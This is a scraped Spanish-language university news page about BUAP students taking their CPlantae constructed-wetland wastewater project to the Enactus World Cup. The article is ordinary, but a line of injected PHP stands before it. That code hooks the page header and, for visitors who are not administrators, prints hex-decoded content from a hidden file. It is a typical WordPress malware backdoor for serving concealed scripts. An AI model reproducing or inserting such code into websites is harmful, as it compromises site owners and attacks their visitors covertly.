if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Estudiantes BUAP representarán a México en Silicon Valley – La Opinión Universitaria La Opinión Universitaria
Menu

Estudiantes BUAP representarán a México en Silicon Valley

 

+ Con su proyecto Cplantae, tecnología a base de plantas acuáticas y lombrices para la limpieza de aguas residuales.

Esta iniciativa de Enactus BUAP, se busca replicar y generar fuentes de empleo en poblaciones de escasos recursos mediante   las plantas acuáticas y lombrices son los principales sistemas biológicos utilizados por CPlantae, una empresa especializada en el saneamiento de aguas residuales de manera eficaz y accesible.

Se hace a través de humedales artificiales. Con este proyecto estudiantes de la BUAP representarán a México en Enactus World Cup, en Silicon Valley, en San José California, Estados Unidos, del 16 al 18 de septiembre próximo.

Rodolfo Aníbal Pérez Ojeda, de la Licenciatura en Comercio Internacional; Zaira Ivette López Núñez, en Dirección Financiera; María Alejandra Flores Cerón, en Administración de Empresas; Daniela Carolina Barragán Mejía, de Administración Turística; y José Luis Ortiz Robles, en Ingeniería Ambiental, conforman el equipo de Enactus BUAP.

La creación de CPlantae surgió a partir de una plática fortuita con don Germán Hernández, habitante de Xicohtzinco, Tlaxcala, cuando José Luis Ortiz Robles se enteró que las plantas acuáticas descontaminan el agua, por lo cual indagó en el fundamento de esta tecnología y su uso en Europa, Canadá y Estados Unidos, bajo el nombre de humedales artificiales.

En 2012, en colaboración con amigos y compañeros, José Luis fundó esta empresa ambiental para limpiar aguas residuales, de la cual es director General.

En comparación con las plantas de tratamiento industrial de aguas residuales, este sistema es barato, eficiente, ecológico, estético y de fácil operación, ya que utiliza plantas acuáticas y lombrices. No usa grandes cantidades de electricidad, químicos ni motores; solo requiere servicios de jardinería, revisión de válvulas, tubos y conexiones.

Con este proyecto, los estudiantes de la BUAP ganaron el primer lugar de la Competencia Nacional Enactus 2019; y en 2015 primer lugar en la categoría de Emprendimiento Social, del Segundo Concurso de Innovación Estudiantil, organizado por la Dirección de Innovación y Transferencia de Conocimiento (DITCo). El premio de este certamen se utilizó en perfeccionar un tercer prototipo en Africam Safari. A partir de entonces, José Luis y sus socios comenzaron a comercializar esta tecnología.

No comments

Deja una respuesta

Tweets recientes